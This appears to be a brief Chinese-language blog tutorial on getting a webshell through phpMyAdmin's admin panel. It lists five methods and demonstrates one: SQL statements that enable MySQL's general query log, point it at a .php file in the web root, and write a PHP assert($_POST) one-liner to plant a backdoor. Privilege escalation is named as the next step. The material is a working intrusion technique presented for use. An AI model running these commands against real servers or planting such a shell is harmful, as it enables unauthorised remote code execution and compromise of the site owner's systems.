• Blog
  • phpmyadmin后台getshell

1、select into outfile直接写入2、开启全局日志getshell3、使用慢查询日志getsehll4、使用错误日志getshell5、利用phpmyadmin4.8.x本地文件包含漏洞getshell

我们先来看一下第一种,直接写shell

发现是不行的,而且该变量为只读,所以只能放弃。

再来看一下第二种,利用全局变量general_log去getshell

我们尝试更改日志状态、位置

set global general_log=on;# 开启日志

set global general_log_file='C:/phpstudy/www/yxcms/v01cano.php';# 设置日志位置为网站目录

发现已经成功更改

此时执行如下语句即可getshell

select '<?php assert($_POST["a"]); ?>'

剩下的就不再去测试了,大家有兴趣的可以去自行尝试

拿到shell之后我们就该提权了



个性签名:Make it
收藏